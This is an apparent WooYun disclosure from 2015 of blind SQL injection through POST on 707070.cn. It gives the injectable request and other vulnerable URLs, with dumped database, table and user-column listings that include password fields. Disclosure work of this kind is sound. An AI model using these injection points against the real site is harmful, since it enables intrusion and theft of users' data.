当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099054

漏洞标题:707070企领网POST盲注一枚

相关厂商:企领网

漏洞作者: 千斤拨四两

提交时间:2015-03-03 14:16

修复时间:2015-04-17 14:18

公开时间:2015-04-17 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

post注入

详细说明:

POST /cyjq/index.aspx?classid=3*&page=2 HTTP/1.1
Content-Length: 7519
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: CheckCode=L0464
Host: www.707070.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
Button1=&newskw=1&searchdomain=&top1%24headSearchType=chanpin&top1%24keywords=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=%2fwEPDwUKLTMxNTE4NTYyNA8WDh4EcGFnZQUBMh4FcGFnZTEFB%2bWIl%2bihqDIeBGlmZHEFASAeBUlEU3RyBQEzHgNwaWQFATAeBHBpZDEFATMeCHByb3ZpbmNlBQbmsrPljJcWAmYPZBYQZg8PFggeBHllYXIC3w8eBW1vbnRoAgIeA2RheQIcHgRkYXRlBRAyMDE15bm0MuaciDI45pelZBYGZg8WAh4EVGV4dAVmPGEgaHJlZj1odHRwOi8vd3d3LjcwNzA3MC5jbiAgdGFyZ2V0PSdfYmxhbmsnPue%2biuW5tOWkp%2bWQie%2b8jOWFg%2bWuteW%2fq%2bS5kCHmnKznq5nml6Xorr%2flrqLotoU15LiHSVA8L2E%2bZAIBDw9kFgQeCm9ua2V5cHJlc3MFG0VudGVyVGV4dEJveCgndG9wMV9TZWFyY2gnKR4HT25Gb2N1cwU0IGlmKHRoaXMudmFsdWU9PSfor7fovpPlhaXlhbPplK7lrZcnKXRoaXMudmFsdWU9Jyc7IGQCBA8WAh8LBWA8YSBocmVmPS9uZXdzL3Nob3ctMjY5NjQ1MS5odG1sICB0YXJnZXQ9J19ibGFuayc%2bMjAxNeW5tOWNgeWkp%2bW4guWcuuiQpemUgOacgOS4uumHjeimgeeahOWPkTwvYT5kAgEPFgIeC18hSXRlbUNvdW50AiIWRGYPZBYCZg8VAgExBuWMl%2bS6rGQCAQ9kFgJmDxUCATIG5aSp5rSlZAICD2QWAmYPFQIBMwbmsrPljJdkAgMPZBYCZg8VAgE0BuWxseilv2QCBA9kFgJmDxUCATUJ5YaF6JKZ5Y%2bkZAIFD2QWAmYPFQIBNgbovr3lroFkAgYPZBYCZg8VAgE3BuWQieael2QCBw9kFgJmDxUCATgJ6buR6b6Z5rGfZAIID2QWAmYPFQIBOQbkuIrmtbdkAgkPZBYCZg8VAgIxMAbmsZ%2foi49kAgoPZBYCZg8VAgIxMQbmtZnmsZ9kAgsPZBYCZg8VAgIxMgblronlvr1kAgwPZBYCZg8VAgIxMwbnpo%2flu7pkAg0PZBYCZg8VAgIxNAbmsZ%2fopb9kAg4PZBYCZg8VAgIxNQblsbHkuJxkAg8PZBYCZg8VAgIxNgbmsrPljZdkAhAPZBYCZg8VAgIxNwbmuZbljJdkAhEPZBYCZg8VAgIxOAbmuZbljZdkAhIPZBYCZg8VAgIxOQblub%2fkuJxkAhMPZBYCZg8VAgIyMAblub%2fopb9kAhQPZBYCZg8VAgIyMQbmtbfljZdkAhUPZBYCZg8VAgIyMgbph43luoZkAhYPZBYCZg8VAgIyMwblm5vlt51kAhcPZBYCZg8VAgIyNAbotLXlt55kAhgPZBYCZg8VAgIyNQbkupHljZdkAhkPZBYCZg8VAgIyNgbopb%2fol49kAhoPZBYCZg8VAgIyNwbpmZXopb9kAhsPZBYCZg8VAgIyOAbnlJjogoNkAhwPZBYCZg8VAgIyOQbpnZLmtbdkAh0PZBYCZg8VAgIzMAblroHlpI9kAh4PZBYCZg8VAgIzMQbmlrDnloZkAh8PZBYCZg8VAgIzMgblj7Dmub5kAiAPZBYCZg8VAgIzMwbpppnmuK9kAiEPZBYCZg8VAgIzNAbmvrPpl6hkAgIPFgIfDgILFhZmD2QWAmYPFQICMzUM55%2bz5a625bqE5biCZAIBD2QWAmYPFQICMzYJ5ZSQ5bGx5biCZAICD2QWAmYPFQICMzcM56em55qH5bKb5biCZAIDD2QWAmYPFQICMzgJ6YKv6YO45biCZAIED2QWAmYPFQICMzkJ6YKi5Y%2bw5biCZAIFD2QWAmYPFQICNDAJ5L%2bd5a6a5biCZAIGD2QWAmYPFQICNDEM5byg5a625Y%2bj5biCZAIHD2QWAmYPFQICNDIJ5om%2f5b635biCZAIID2QWAmYPFQICNDMJ5rKn5bee5biCZAIJD2QWAmYPFQICNDQJ5buK5Z2K5biCZAIKD2QWAmYPFQICNDUJ6KGh5rC05biCZAIDDxYCHgdWaXNpYmxlaGQCBA8WAh8OAgwWGGYPZBYCZg8VBQMyMzkCMTUb5piM6buO5Y6%2f55Wc54mn5Lqn5Lia6ZuG576kBuays%2bWMlwznp6bnmoflspvluIJkAgEPZBYCZg8VBQMxMzYCMTQi5bGx5rW35YWz6YeR5bGe5p2Q5paZ5Lqn5Lia6ZuG576kIAbmsrPljJcM56em55qH5bKb5biCZAICD2QWAmYPFQUDMTQzAjEzJ%2ba1t%2ba4r%2beOu%2beSg%2bWPiuWFtua3seWKoOW3peS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIDD2QWAmYPFQUDMzIyAjEyKuenpueah%2bWym%2beyruayuemjn%2bWTgeWKoOW3peS4muS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIED2QWAmYPFQUDMzIxAjExH%2bWNoum%2bmeacuuaisOWItumAoOS6p%2bS4mumbhue%2bpCAG5rKz5YyXDOenpueah%2bWym%2bW4gmQCBQ9kFgJmDxUFAjc3AjEwGeaKmuWugeawtOazpeS6p%2bS4mumbhue%2bpCAG5rKz5YyXDOenpueah%2bWym%2bW4gmQCBg9kFgJmDxUFAzI4NwE5GOWNoum%2bmeeUmOiWr%2bS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAIHD2QWAmYPFQUDMjg1ATgi5YyX5oi05rKz5paH5YyW5Yib5oSP5Lqn5Lia6ZuG576kIAbmsrPljJcM56em55qH5bKb5biCZAIID2QWAmYPFQUDMzIxATcn5piM6buO5aSn6JKy5rKz546J57Gz572Q5aS05Lqn5Lia6ZuG576kBuays%2bWMlwznp6bnmoflspvluIJkAgkPZBYCZg8VBQMzMjUBNifnp6bnmoflspvmsb3ovablj4rpm7bpg6jku7bkuqfkuJrpm4bnvqQG5rKz5YyXDOenpueah%2bWym%2bW4gmQCCg9kFgJmDxUFAzIzNgE1KuaYjOm7juWOv%2bWQjuWPjOe8nee6q%2bacuumbtuS7tuS6p%2bS4mumbhue%2bpAbmsrPljJcM56em55qH5bKb5biCZAILD2QWAmYPFQUDMjMwATQXIOWUkOWxsemZtueTt%2bS6p%2bS4mue%2bpCAG5rKz5YyXCeWUkOWxseW4gmQCBQ8PFg4eCVVybFBhZ2luZ2ceCFBhZ2VTaXplAgweC1JlY29yZGNvdW50AhkeDFVybFJld3JpdGluZ2ceEEN1cnJlbnRQYWdlSW5kZXgCAh4OQ3VzdG9tSW5mb1RleHQFggHlvZPliY3nrKw8Zm9udCBjb2xvcj0nI2ZmODgwMCc%2bMjwvZm9udD4vM%2bmhtSAg5YWxPGZvbnQgY29sb3I9JyNmZjg4MDAnPjI1PC9mb250PuadoeiusOW9lSDmr4%2fpobU8Zm9udCBjb2xvcj0nI2ZmODgwMCc%2bMTI8L2ZvbnQ%2b5p2hHglVUlBhdHRlcm4FEGxpc3QtMy1wezB9Lmh0bWxkZAIIDxYCHw4CChYUZg9kFgJmDxUDJ%2bmrmOaWsOWMuuW0m%2bi1t%2bWNq%2baYn%2bmAmuS%2foeS6p%2bS4mumbhue%2bpAcyNjk1ODU2J%2bmrmOaWsOWMuuW0m%2bi1t%2bWNq%2baYn%2bmAmuS%2foeS6p%2bS4mumbhue%2bpGQCAQ9kFgJmDxUDNuaOouaygumVh%2baJk%2bmAoOS4tOayguadv%2badkOWutuWFt%2bS6p%2bS4mumbhue%2bpOaguOW%2fg%2bWMugcyNjk1ODU1LeaOouaygumVh%2baJk%2bmAoOS4tOayguadv%2badkOWutuWFt%2bS6p%2bS4mumbhue%2bpGQCAg9kFgJmDxUDMOacieWFs%2bS4iueKuemhueebruW8uuWfuuWjruWkp%2bS6p%2bS4mumbhue%2bpOi1hOiurwcyNjk1ODU0LeacieWFs%2bS4iueKuemhueebruW8uuWfuuWjruWkp%2bS6p%2bS4mumbhue%2bpOi1hGQCAw9kFgJmDxUDIeWGnOS4muS6p%2bS4mumbhue%2bpOimgeaJqeWkp%2binhOaooQcyNjk1ODUzIeWGnOS4muS6p%2bS4mumbhue%2bpOimgeaJqeWkp%2binhOaooWQCBA9kFgJmDxUDPTIwMTXkuqfkuJrpm4bogZrljLrovazlnovljYfnuqfkuJPpobnooYzliqjorqHliJLmraPlvI%2flkK%2fliqgHMjY5NTg1MisyMDE15Lqn5Lia6ZuG6IGa5Yy66L2s5Z6L5Y2H57qn5LiT6aG56KGM5YqoZAIFD2QWAmYPFQMw5YWI6L%2bb57uP6aqM5o6o5Yqo5Lqn5Lia5Y2H57qn5YC85b6X5oiR5Lus5a2m5LmgBzI2OTU4NTEt5YWI6L%2bb57uP6aqM5o6o5Yqo5Lqn5Lia5Y2H57qn5YC85b6X5oiR5Lus5a2mZAIGD2QWAmYPFQM25YGl5bq356eR5oqA77ya5Lit5bGx5YGl5bq356eR5oqA5Yib5paw5Z6L5Lqn5Lia6ZuG576kBzI2OTU4NTAt5YGl5bq356eR5oqA77ya5Lit5bGx5YGl5bq356eR5oqA5Yib5paw5Z6L5LqnZAIHD2QWAmYPFQM15o2u5oql6YGT77yM5LuK5bm06YeN54K55o6o6L%2bbNjDkuKrkuqfkuJrpm4bnvqTlj5HlsZUHMjY5NTg0OSzmja7miqXpgZPvvIzku4rlubTph43ngrnmjqjov5s2MOS4quS6p%2bS4mumbhmQCCA9kFgJmDxUDOOaJk%2bmAoOmrmOerr%2bS6p%2bS4mumbhue%2bpCAg5o6o6L%2bb5YWI6KGM5YWI6K%2bV5pS56Z2p5Lu75YqhBzI2OTU4NDgs5omT6YCg6auY56uv5Lqn5Lia6ZuG576kICDmjqjov5vlhYjooYzlhYjor5VkAgkPZBYCZg8VAzbigJzms6Xohb%2flt6jkurrigJ3miJDkuLrpm4bnvqTpvpnlpLTkvIHkuJrnmoTku6PlkI3or40HMjY5NTg0Ny3igJzms6Xohb%2flt6jkurrigJ3miJDkuLrpm4bnvqTpvpnlpLTkvIHkuJrnmoRkAgkPFgIfDgIKFhRmD2QWAgIBDxYCHwsFbTxBIGhyZWY9Jy96ZmNnL3Nob3ctYzE5Ny5odG1sJyB0aXRsZT3lub%2flt57mlL%2flupzph4fotK3nvZEgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuW5v%2bW3nuaUv%2bW6nOmHh%2bi0ree9kTwvQT5kAgEPZBYCAgEPFgIfCwWPATxBIGhyZWY9Jy96ZmNnL3Nob3ctcDMuaHRtbCcgdGl0bGU95bm%2f6KW%2f5aOu5peP6Ieq5rK75Yy65pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7lub%2fopb%2flo67ml4%2foh6rmsrvljLrmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAICD2QWAgIBDxYCHwsFazxBIGhyZWY9Jy96ZmNnL3Nob3ctMjUuaHRtbCcgdGl0bGU95pS%2f5bqc6YeH6LSt5L%2bh5oGv572RIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7mlL%2flupzph4fotK3kv6Hmga%2fnvZE8L0E%2bZAIDD2QWAgIBDxYCHwsFcjxBIGhyZWY9Jy96ZmNnL3Nob3ctYzg3Lmh0bWwnIHRpdGxlPeadreW3nuW4guaUv%2bW6nOmHh%2bi0ree9kSBzdHlsZT0nZm9udC1zaXplOjE0cHg7JyA%2b5p2t5bee5biC5pS%2f5bqc6YeH6LSt572RPC9BPmQCBA9kFgICAQ8WAh8LBYoBPEEgaHJlZj0nL3pmY2cvc2hvdy1wMjQuaHRtbCcgdGl0bGU95YaF6JKZ5Y%2bk6Ieq5rK75Yy65pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7lhoXokpnlj6Toh6rmsrvljLrmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAIFD2QWAgIBDxYCHwsFcTxBIGhyZWY9Jy96ZmNnL3Nob3ctcDQuaHRtbCcgdGl0bGU95rW35Y2X5pS%2f5bqc6YeH6LSt5Lit5b%2bDIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7mtbfljZfmlL%2flupzph4fotK3kuK3lv4M8L0E%2bZAIGD2QWAgIBDxYCHwsFeTxBIGhyZWY9Jy96ZmNnL3Nob3ctYzIwMC5odG1sJyB0aXRsZT3nj6DmtbfluILmlL%2flupzph4fotK3kuK3lv4Mgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuePoOa1t%2bW4guaUv%2bW6nOmHh%2bi0reS4reW%2fgzwvQT5kAgcPZBYCAgEPFgIfCwV3PEEgaHJlZj0nL3pmY2cvc2hvdy0yMS5odG1sJyB0aXRsZT3kuK3lm73mlL%2flupzph4fotK3noJTnqbbmiYAgc3R5bGU9J2ZvbnQtc2l6ZToxNHB4OycgPuS4reWbveaUv%2bW6nOmHh%2bi0reeglOeptuaJgDwvQT5kAggPZBYCAgEPFgIfCwV%2bPEEgaHJlZj0nL3pmY2cvc2hvdy1wMTQuaHRtbCcgdGl0bGU96L695a6B55yB5pS%2f5bqc6ZuG5Lit6YeH6LSt572RIHN0eWxlPSdmb250LXNpemU6MTRweDsnID7ovr3lroHnnIHmlL%2flupzpm4bkuK3ph4fotK3nvZE8L0E%2bZAIJD2QWAgIBDxYCHwsFbDxBIGhyZWY9Jy96ZmNnL3Nob3ctcDE3Lmh0bWwnIHRpdGxlPemdkua1t%2baUv%2bW6nOmHh%2bi0ree9kSBzdHlsZT0nZm9udC1zaXplOjE0cHg7JyA%2b6Z2S5rW35pS%2f5bqc6YeH6LSt572RPC9BPmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFB0J1dHRvbjHFC%2beJEn5h8jYo339cogMrTqzQPg%3d%3d


http://www.707070.cn/ajax/newspj.aspx?aid=2696455&id=good&time=1425106320821
http://www.707070.cn/ajax/vote.aspx?id=good&time=1425106335576&vid=
37
http://www.707070.cn/cyjq/index.aspx?classid=3&page=2
http://www.707070.cn//news/list.aspx?classid=1
都存在注入


数据库信息:

available databases [11]:                                                      
[*] 33fanwennew
[*] 70
[*] 70yule
[*] jinghua
[*] master
[*] model
[*] msdb
[*] shangcheng
[*] tempdb
[*] tfsbfj
[*] tfsbqiye
Database: 70
[289 tables]
+--------------------------+
| Canshou |
| IPTABLE |
| Kind |
| NM_LoginInfo |
| S_City |
| S_District |
| S_Province |
| TB_Menu |
| UpdateNewsContentjilu |
| View_compro |
| View_indexpj |
| View_khlx |
| View_otherpro |
| View_pjlist |
| View_pjsalepx |
| View_proclass |
| View_proclass |
| View_salepx |
| View_salexx |
| View_samplelist |
| View_tb_user |
| View_userdep |
| fj_user0-3 |
| fj_user0-3 |
| fj_user11-13 |
| fj_user13-15 |
| fj_user15-17 |
| fj_user3-5 |
| fj_user5-7 |
| fj_user7-9 |
| fj_user9-11 |
| address |
| administrator |
| annualrevenue |
| aprofiletemp |
| baojia |
| biztype |
| chanpincontentjilu |
| commend |
| companysize |
| dtproperties |
| fj_70usercaiji |
| fj_usercaiji |
| fj_userdelete |
| fj_userhangye |
| fj_userlist |
| fj_usernew |
| fj_usersearch |
| fj_usertemp |
| insertcgsjilu |
| interview |
| jbright_article_cyjq |
| jbright_article_cyjq |
| jbright_article_qysp |
| jbright_article_zfcg |
| jbright_articlebf |
| jbright_articleminglu |
| jbright_articlemobi |
| jbright_articletest |
| jbright_secret |
| kh_33qiyenews |
| kh_70news |
| kh_70otherprotemp |
| kh_City |
| kh_District |
| kh_Province |
| kh_adminlog |
| kh_al |
| kh_anli |
| kh_areacode |
| kh_article2 |
| kh_article2 |
| kh_articleclass2 |
| kh_articleclass2 |
| kh_articleclass3com |
| kh_articleclass3com |
| kh_articleclass3pro |
| kh_articleclass3temp |
| kh_articlelink |
| kh_articletemp |
| kh_az |
| kh_bspmax |
| kh_bspmaxtemp |
| kh_bzclass |
| kh_bzclass |
| kh_caigouclass |
| kh_caigouclass |
| kh_caijipub |
| kh_cgly |
| kh_cgmsg |
| kh_cgsbd |
| kh_cgsbd |
| kh_cgsiduserid |
| kh_cgsuser |
| kh_chanye |
| kh_chanyesf |
| kh_chengguo |
| kh_chengyu |
| kh_classkw1 |
| kh_classkw1 |
| kh_classkw2 |
| kh_classprokw2 |
| kh_comlz |
| kh_compj |
| kh_comproclass |
| kh_comtest |
| kh_cpzt |
| kh_cpztxg |
| kh_delcgs |
| kh_delchanpin |
| kh_delly |
| kh_email |
| kh_esxx |
| kh_fjpro |
| kh_fjuser |
| kh_ftjf |
| kh_gbook |
| kh_getpwd |
| kh_gongyijigou |
| kh_gongyijigou |
| kh_gongyinews |
| kh_gongyiyulu |
| kh_history |
| kh_huafei |
| kh_hyjhcg |
| kh_hytop2offer |
| kh_hz |
| kh_indexarticle |
| kh_indexcom |
| kh_indexpro |
| kh_ip |
| kh_jflist |
| kh_jhaoyou |
| kh_jhcg |
| kh_jl |
| kh_jobclass |
| kh_jobclass |
| kh_joinnum |
| kh_kh |
| kh_khzl |
| kh_kjbuchong |
| kh_kjtz |
| kh_lastlf |
| kh_lbchuli |
| kh_link_mlzx |
| kh_link_mlzx |
| kh_linkqy |
| kh_ljlb |
| kh_luck |
| kh_ly |
| kh_minglumes |
| kh_mingyan |
| kh_msg |
| kh_nametest |
| kh_newspj |
| kh_otherarticle |
| kh_otherdzyb |
| kh_otherprobf |
| kh_otherprobf |
| kh_otherprocandel |
| kh_otherprotemp |
| kh_otherprozishujiaoshao |
| kh_pjcaozuo |
| kh_pjclass |
| kh_pl |
| kh_proclass1 |
| kh_proclass1 |
| kh_proclass2 |
| kh_proclass3 |
| kh_proclassshuxing |
| kh_prokwcandel |
| kh_prolbchuli1 |
| kh_prolbchuli1 |
| kh_propj |
| kh_proshuxinglist |
| kh_proshuxinglist |
| kh_qiyetag |
| kh_qq |
| kh_qyhd |
| kh_qyhd |
| kh_randarticle |
| kh_randlink |
| kh_randprolink |
| kh_rdhtnews |
| kh_rdhtnews |
| kh_renzheng |
| kh_rzpj |
| kh_searchkh |
| kh_sendemail |
| kh_sgmes |
| kh_shybook |
| kh_sjy |
| kh_sor |
| kh_splink |
| kh_sppj |
| kh_syscanshu |
| kh_sysset |
| kh_tagclass |
| kh_tbclass |
| kh_temp1 |
| kh_temp1 |
| kh_temp2 |
| kh_tempclasskw |
| kh_tempdelpro |
| kh_tempproclasskw |
| kh_tempproclasskw |
| kh_tjcgs |
| kh_tjoffer |
| kh_tjpro |
| kh_tongjimember |
| kh_tongjimember |
| kh_tongjiqiantai |
| kh_tophd |
| kh_tougao |
| kh_updatepro |
| kh_user4 |
| kh_userlink |
| kh_userlog |
| kh_usermenu |
| kh_usernum |
| kh_usershuxing |
| kh_usersonmenu |
| kh_vistior |
| kh_votemingpian |
| kh_votemingpian |
| kh_votepjmingpian |
| kh_votepjmingpian |
| kh_weibo |
| kh_wymsg |
| kh_xc |
| kh_xguser |
| kh_xgusertemp |
| kh_xiaohua |
| kh_xiaotu |
| kh_xmcs |
| kh_xunrencs |
| kh_xunrencs |
| kh_xunrenpl |
| kh_xxautogengxin |
| kh_xxcaozu |
| kh_xxclassminglu |
| kh_xxclassminglu |
| kh_xxcom |
| kh_xxkw |
| kh_xykjlf |
| kh_yqlj |
| kh_yyclass |
| kh_zfcg |
| kh_zfclass |
| kh_zhanhui |
| kh_zhishuset |
| kh_zhuanjia |
| kh_zhufu |
| kh_ziliaoclass |
| kh_ziliaoclass |
| kh_zipcode |
| kh_zixun |
| kh_zjhf |
| kh_zjlog |
| kh_zlclass |
| kh_zlclass |
| kh_zlmm |
| kh_zlpj |
| kh_zs |
| kh_zt |
| kh_zzad |
| kwad |
| liuyanall |
| liuyanall |
| liuyanmingpian |
| pangolin_test_table |
| pjoffer |
| principalship |
| product_company |
| product_sonsort |
| product_sort |
| province |
| provincetemp |
| s_bpic |
| s_spic |
| searchkw |
| shangyu |
| shoucang |
| topic_type |
| updatecardlogodatajilu |
| updatecardtimejiluflag |
| updatecardtimejiluflag |
| updatejilu |
| yjtg_tophd |
+--------------------------+
Database: 70
Table: fj_70usercaiji
[156 columns]
+-------------------+
| Column |
+-------------------+
| adddate |
| address |
| age |
| annualrevenue_id |
| answer |
| bad |
| biztype_id |
| bz1 |
| c |
| caozuo |
| caozuoadddate |
| caozuoadddate1 |
| cgpro |
| cgsid |
| chandi |
| city |
| comadddate |
| comms |
| companyname |
| companypage |
| companysize_id |
| companysizeqt |
| complace |
| crmcontent |
| d |
| delnum |
| departname |
| email |
| ewm |
| ewmsize |
| faren |
| fax |
| fjuserid |
| fsdate |
| gender |
| good |
| grade |
| grade_pass |
| grade_passaddyear |
| grade_passdate |
| guimo |
| gz |
| hangye |
| hits |
| hytype |
| ifcgs |
| ifcl |
| iffs |
| iffs3 |
| iftop |
| ifts |
| ifxz |
| img |
| imgcaozuo |
| IP |
| jf |
| jhqgid |
| jianjie |
| jobtitle |
| jointime |
| jyms |
| khlevel |
| khorder |
| khtype |
| lastloghyzx |
| lastlogtime |
| lastlxdate |
| lastpjdate |
| lastxxdate |
| lastztdate |
| loglx |
| lognum |
| membertype |
| mfnum |
| mmfj |
| mmfjtjhy |
| modidate |
| mpassnum |
| msgread |
| msn |
| myid |
| myid1 |
| nextlx |
| nickname |
| nothy |
| noxxts |
| othercpid |
| otherpjid |
| otherybid |
| p |
| paddress |
| pass |
| passnum |
| password |
| pcompanyname |
| pemail |
| pfax |
| phone |
| pmphone |
| point |
| postcode |
| pprofile |
| pqq |
| principalship |
| principalship_id |
| profile |
| province_id |
| ptel |
| qq |
| qqid |
| question |
| see |
| session |
| sex |
| shangye |
| sinaid |
| smdate |
| smpass |
| sqdate |
| suozaidi |
| telnum |
| TitleColor |
| TitleColor1 |
| tjhy |
| tjzj |
| truename |
| ucenterstyle |
| ucenterword |
| user_checked |
| user_id |
| user_mark |
| user_rongyu |
| user_rongyu_intro |
| user_style |
| user_zizhi |
| user_zizhi_intro |
| username |
| UserTopicCount |
| xcy |
| xcy1 |
| xueli |
| yes1 |
| yes2 |
| yes3 |
| yye |
| yz |
| yzok |
| z1 |
| zclb |
| zhic |
| zhiw |
| zijin |
| zy |
| zyhangye |
| zynum |
| zypro |
+-------------------+
数据信息较庞大


漏洞证明:

dd.png


ttt.png


p.jpg

修复方案:

看好你。。。

版权声明:转载请注明来源 千斤拨四两@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝